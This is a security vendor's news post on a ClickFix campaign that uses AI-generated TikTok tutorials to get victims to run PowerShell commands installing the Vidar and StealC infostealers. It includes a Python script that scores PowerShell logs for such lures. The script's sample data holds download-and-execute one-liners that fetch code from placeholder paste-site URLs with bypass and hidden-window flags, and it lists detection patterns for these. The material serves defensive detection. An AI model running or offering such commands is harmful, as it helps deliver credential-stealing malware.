News

July 28, 2025

TikTok: Malware Hides Among Viral Videos

TikTok is one of the most downloaded apps ever. In 2025 it has also become something else: an effective vector for delivering sophisticated malware straight to victims’ devices, with direct and underestimated consequences for companies as well. An article published by The Hacker News described how cybercriminals are using TikTok videos to spread Vidar and StealC, two malware families known for stealing sensitive data from browsers, cryptocurrency wallets, and the operating system itself.

The mechanism? A mix of artificial intelligence, social engineering, and human vulnerabilities.

TikTok, PowerShell, and Infostealer: The Unsuspecting Triad

Some attackers are posting seemingly harmless videos on TikTok: tutorials for activating commercial software such as Office, Spotify, Windows or Adobe for free.
Nothing new, except that:

  • the faces and voices in the videos are created with generative AI
  • the videos walk the viewer through typing and running a PowerShell command
  • that command fetches a malicious payload, via Pastebin, and runs it
  • the payload installs Vidar or StealC on the victim’s machine

This technique is known as ClickFix: the victim is persuaded to paste and run the command themselves, so no exploit, attachment, or drive-by download is involved. Anyone who follows the tutorial opens the door to an infostealer.

It is a low-cost, high-yield strategy that is hard to intercept with traditional filters, because the malicious action is performed by the user rather than delivered by a file or an exploit. It is a direct threat to any company that manages mobile apps or BYOD environments, where the end user is often the weakest link in the chain.
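One way a security team can catch this on the endpoint side, added here as an example that is not part of the original article or of The Hacker News report: a small Python triage script that scans the text of PowerShell Script Block Logging entries (Event ID 4104) for the combination the lure relies on, a download cradle, in-memory execution, a paste site, plus execution-policy and hidden-window flags. The four log entries are constructed for illustration, the Pastebin and paste.ee URLs are placeholders rather than real paste IDs, and the indicator list and weights are my own assumptions, not a published detection rule.

```python
"""Triage PowerShell script-block log text for ClickFix-style lures.

Added example (not from the original page). It scores each script block
against indicators typical of the lure described in the article: a remote
download executed in memory, often from a paste site, with flags that
bypass the execution policy or hide the console window.
"""
import re
from dataclasses import dataclass, field

# (name, case-insensitive regex, weight). Assumed weights, tune to your telemetry.
INDICATORS = [
    ("download-cradle",
     r"\b(?:irm|Invoke-RestMethod|iwr|Invoke-WebRequest|DownloadString|DownloadFile)\b", 2),
    ("in-memory-exec", r"\b(?:iex|Invoke-Expression)\b", 2),
    ("paste-site", r"\b(?:pastebin\.com|paste\.ee|rentry\.co|hastebin\.com)\b", 2),
    ("policy-bypass", r"-(?:ExecutionPolicy|ep)\s+Bypass", 1),
    ("hidden-window", r"-(?:WindowStyle|w)\s+Hidden", 1),
    ("encoded-command", r"-(?:EncodedCommand|enc|e)\s+[A-Za-z0-9+/=]{20,}", 2),
    ("defender-tamper", r"\b(?:Set|Add)-MpPreference\b", 1),
]

# Constructed sample script blocks, as they would appear in Event ID 4104.
SAMPLE_EVENTS = [
    # routine admin work: no indicators
    "Get-ChildItem C:\\Logs -Filter *.log | Sort-Object LastWriteTime",
    # a download from an internal host: worth a look, not a lure by itself
    "Invoke-WebRequest https://intranet.example/tools/agent.msi -OutFile agent.msi",
    # constructed ClickFix-style one-liner: fetch a paste and execute it in memory
    "iex (irm https://pastebin.com/raw/EXAMPLE1)",
    # constructed variant with bypass flags and a classic WebClient cradle
    "powershell -ep Bypass -w Hidden -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('https://paste.ee/r/EXAMPLE2')\"",
]


@dataclass
class Finding:
    script: str
    matched: list[str] = field(default_factory=list)
    score: int = 0
    verdict: str = "benign"


def analyze(script_text: str) -> Finding:
    """Score one script block and return which indicators fired."""
    finding = Finding(script=script_text)
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, script_text, re.IGNORECASE):
            finding.matched.append(name)
            finding.score += weight
    # A cradle plus in-memory execution already reaches 4; a lone download does not.
    if finding.score >= 4:
        finding.verdict = "clickfix-suspect"
    elif finding.score >= 2:
        finding.verdict = "review"
    return finding


def triage(events: list[str]) -> list[Finding]:
    """Analyze a batch of script blocks, keeping input order."""
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.verdict:17} score={f.score} {f.matched}  {f.script[:60]}")
```

Script Block Logging has to be switched on (it is off by default outside Windows Server 2022 and later defaults) for these events to exist at all; once it is, the same scoring can be fed from a SIEM query rather than a list of strings. The "review" tier is deliberate: a bare `Invoke-WebRequest` is routine for administrators, and it is the cradle-plus-execution pairing that distinguishes the lure.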

From TikTok to Corporate Backdoor: The Invisible Risk

Imagine this scenario: an employee watches a video on TikTok during their break. They want Spotify for free, so they run the command on their laptop (the one-liner targets Windows, where Vidar and StealC run) and unknowingly install StealC. The malware harvests browser cookies, session tokens, and temporary files. If that employee logs into corporate portals, or the web front ends of enterprise mobile apps, from the same machine, their credentials and data are compromised.

This is not a hypothetical risk. Vidar and StealC are designed to operate silently, collect data in the background, and send it to a command-and-control (C2) server run by criminal operators. They can exfiltrate:

  • passwords saved in browsers
  • webmail or VPN login credentials
  • information on crypto wallets or banking data
  • any tokens used by corporate mobile apps

Are your business mobile apps used on personal devices?
Ask for an MDM or UEM assessment

Why Are These Attacks so Effective?

There are many reasons for the success of the ClickFix technique. First, the faces and voices generated with artificial intelligence make the videos look professional, human, and convincing. Second, the tutorials are presented as free, immediate solutions to everyday wants: who wouldn’t want Spotify Premium without paying?

But there is another element that should not be underestimated: mass distribution through a viral algorithm. TikTok favors content that receives many interactions in its first few seconds. Attackers use bot accounts to inflate initial views artificially, so that the videos are pushed to real users as well.

Mobile Apps in the Indirect Crosshairs

And here comes a key element: the indirect risk to corporate apps. Not because they are a direct target of ClickFix, but because they live on compromised devices.

In 2025, a corporate mobile application may sit alongside TikTok, Instagram, Spotify and other personal apps, especially where BYOD (Bring Your Own Device) is permitted. If the device is compromised, the data generated by or exchanged with the mobile app is at risk too. OAuth tokens, session cookies, API keys: all of it can be harvested and replayed.

Mobile app security is no longer limited to code or authentication. It must extend to the context in which the app runs. And that context also includes social media.

Don’t have control over the devices your apps run on?
Ask for an MDM or UEM assessment

What Companies Should Do Today

In light of these scenarios, the most concrete advice for security and development teams is to raise the level of awareness and prevention, on both the user side and the application side. In particular:

  1. Educate users on hidden risks in social and non-corporate apps
  2. Limit unnecessary permissions in mobile apps
  3. Avoid local storage of persistent credentials or long-lived tokens
  4. Perform MDM or UEM assessments on corporate and BYOD devices


ClickFix shows how easy it is to compromise a device. You can make it hard to exploit.
Contact us for an assessment of your devices